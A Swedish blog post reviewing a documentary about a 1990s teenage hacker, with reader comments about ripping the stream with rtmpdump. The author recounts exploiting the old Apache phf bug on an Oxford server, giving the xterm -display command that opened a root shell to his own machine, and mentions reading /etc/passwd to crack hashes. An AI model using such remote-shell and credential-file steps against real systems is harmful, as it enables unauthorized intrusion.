Att Hacka en Stormakt

Söndag 2010-10-10 sände svt dokumentären Att Hacka en Stormakt. Klicka på länken för att titta. Videon kommer finnas tillgänglig fram till tisdag 9 november. Om du vill spara filmen för evigt kan du köra följande kommando:

./rtmpdump -r ‘rtmp://fl11.c91005.cdn.qbrick.com/91005/_definst_/kluster/20101008/PG-1137067-001A-ATTHACKAENSTO-01-mp4-e-v1.mp4’ -o atthackaenstormakt.flv

Se tidigare inlägg för mer info om hur det där fungerar.

 

Att Hacka en Stormakt

 

 

Filmen handlar om Joel som gradvis förvandlades från en gamer till en hacker. Inte hacker i ordets egentliga bemärkelse utan hacker i den betydelse Hollywood laddat ordet med. Alltså en person som utan tillåtelse bryter sig in i andras datorsystem. Livet förändrades när Joel upptäckte phf-buggen i Apache. Apache var den i särklass mest använda webbservern och med den kom ett CGI-script som inte tvättade sina indata ordentligt. Det innebar att den som attackerade systemet via phf kunde köra godtyckligt kommando på servern. Exempelvis cat /etc/passwd som innehöll alla användarnamn och en hash (digitalt fingeravtryck) av användarnas lösenord. Detta kunde sedan matas in i ett program som gissar lösenord tills den träffar rätt. Det vanligaste programmet för detta ändamål var crack. Idag finns mer specialiserade program som JtR men grundidén är den samma. Gissa lösenord, räkna ut hashen för varje gissat lösenord och jämföra med hashen från /etc/passwd. Är hashen lika – bingo. Idag lagras bara användarnamnet där medan hashen lagras i filen /etc/shadow, som inte är läsbar för vanliga användare.

Det var egentligen fantastiskt att var och varannan server runt hela världen var drabbad av phf-buggen under många månader. Idag går det inte mer än en vecka innan sådana här hål är tilltäppta och serveradmins är enormt mycket snabbare på att installera säkerhetsuppdateringar idag än de var på 1990-talet. Den som lyckas hitta ett sådant här opatchat säkerhetshål kan till och med sälja det idag. Men det rekommenderade är att först kontakta den som ligger bakom programmet och sedan rapportera in till exempelvis bugtraq.

Dokumentären är intressant för den fångar en tidsanda. Precis så var det på 1990-talet. Jag gick själv på högskolan vid tidpunkten och minns hur jag med förskräckelse testade phf-buggen första gången. Jag var inloggad på en Solarisburk och läste om phf-buggen i en nyhetsgrupp. Jag gjorde genast en sökning på webcrawler (eller om det var altavista) och fick upp tusentals sidor som var sårbara. När jag bläddrade bland domänerna fastnade jag för Oxfords universitet som lät bekant. Jag skrev först xhost + på min dator och riktade sen netscape mot Oxford och gav kommandot /usr/bin/xterm -display 1.2.3.4:0 (byt ut 1.2.3.4 mot den egna datorns ip-adress och mellanslag mot %20). Efter ett par sekunder ploppade ett xterm-fönster upp på min skärm. Jag gav bara ett kommando innan jag loggade ut:

# whoami
root

Inte nog med att jag kunde köra kommandon som webbserveranvändaren, denna användare var dessutom systemadministratören root. Redan på den tiden var det en dödssynd att köra webservern under rootanvändaren. Men så gick det i alla fall till i Oxford på 1990-talet.

Joel i filmen nöjde sig inte med att testa en gång. Han skaffade sig access på servrar runt hela världen och använde dessa till att köra crack på för att knäcka ännu flera lösenord. Dessutom installerade han en dold sniffer på servrarna som snappade upp nya lösenord när någon loggade in. När han började ta sig in i militära system i USA så började dock myndigheterna dra öronen åt sig. De upprättade snart ett samarbete med svenska polisen och Joel åkte till slut fast. Men historien slutar lyckligt. Joel fick jobb på en datasäkerhetsfirma.

Dokumentären är välgjord och rekommenderas. Skynda på att se den innan den försvinner från svtplay.

Lyssna även på P3-dokumentärs program om samma gäng.

Annonser

Om albertveli

Grävande programmerare.
Det här inlägget postades i Linux/DIY, Recension, Säkerhet. Bokmärk permalänken.

6 kommentarer till Att Hacka en Stormakt

  1. Ping: Liljedahl.ME » Trådlös säkerhet finns det?

  2. Steffe skriver:

    Tyvärr verkar inte RTMP-adressen du postade fungera längre…
    Här är det jag fick fram ur strömmen, notera att det är ett C istället för ett E i filnamnet.

    http://pastebin.com/iBjvW8iN

  3. Albert skriver:

    Skumt jag testade igen att gå in med firefox och samtidigt spela in trafiken med wireshark. Wireshark säger bestämt:

    rtmp://fl11.c91005.cdn.qbrick.com/91005/_definst_/kluster/20101008/PG-1137067-001A-ATTHACKAENSTO-01-mp4-e-v1.mp4

    Men det kan ju vara så att man först måste gå in med firefox innan man startar rtmpdump så att IP-adressen registreras. Fast nu gissar jag bara..

  4. Steffe skriver:

    Jag får hur som helst upp:
    NetStream.Play.StreamNotFound…
    Du kan prova att kolla igenom källkoden på sidan också, som hänvisar till flera st olika adresser.

    • albertveli skriver:

      Ursäkta att kommentaren inte syns förrän nu. Jag missade att wordpress tydligen placerat kommentaren i spamhögen.

      Om du vill testa själv kan du testa med wireshark. Jag gjorde en kort video som visar hur: http://www.youtube.com/watch?v=y8pdqZLwCYc

      Ibland går det att hitta rtmp url-en direkt i html-koden och ibland går det inte. Men wiresharkmetoden funkar för det mesta. Den enda som det inte funkar för är videoplaza (som bl.a. tv4 använder).

  5. albertveli skriver:

    Alltså, det är teoretiskt möjligt att rippa även videoplaza, men rtmp urlen är inte listad någonstans i sin helhet i wireshark-dumpen. Man får hålla på att pussla ihop den själv och det är tidsödande att få det korrekt. Det kräver både tålamod och tur.

    Då är det faktiskt enklare att helt enkelt titta på videon och samtidigt spela in skärmen med något screendump-program. Jag testade några olika och den som funkade allra bäst var snapz pro. Det gick knappt att se någon skillnad på den ”inspelade” videon och den rippade videon.

Kommentera

Fyll i dina uppgifter nedan eller klicka på en ikon för att logga in:

WordPress.com Logo

Du kommenterar med ditt WordPress.com-konto. Logga ut / Ändra )

Twitter-bild

Du kommenterar med ditt Twitter-konto. Logga ut / Ändra )

Facebook-foto

Du kommenterar med ditt Facebook-konto. Logga ut / Ändra )

Google+ photo

Du kommenterar med ditt Google+-konto. Logga ut / Ändra )

Ansluter till %s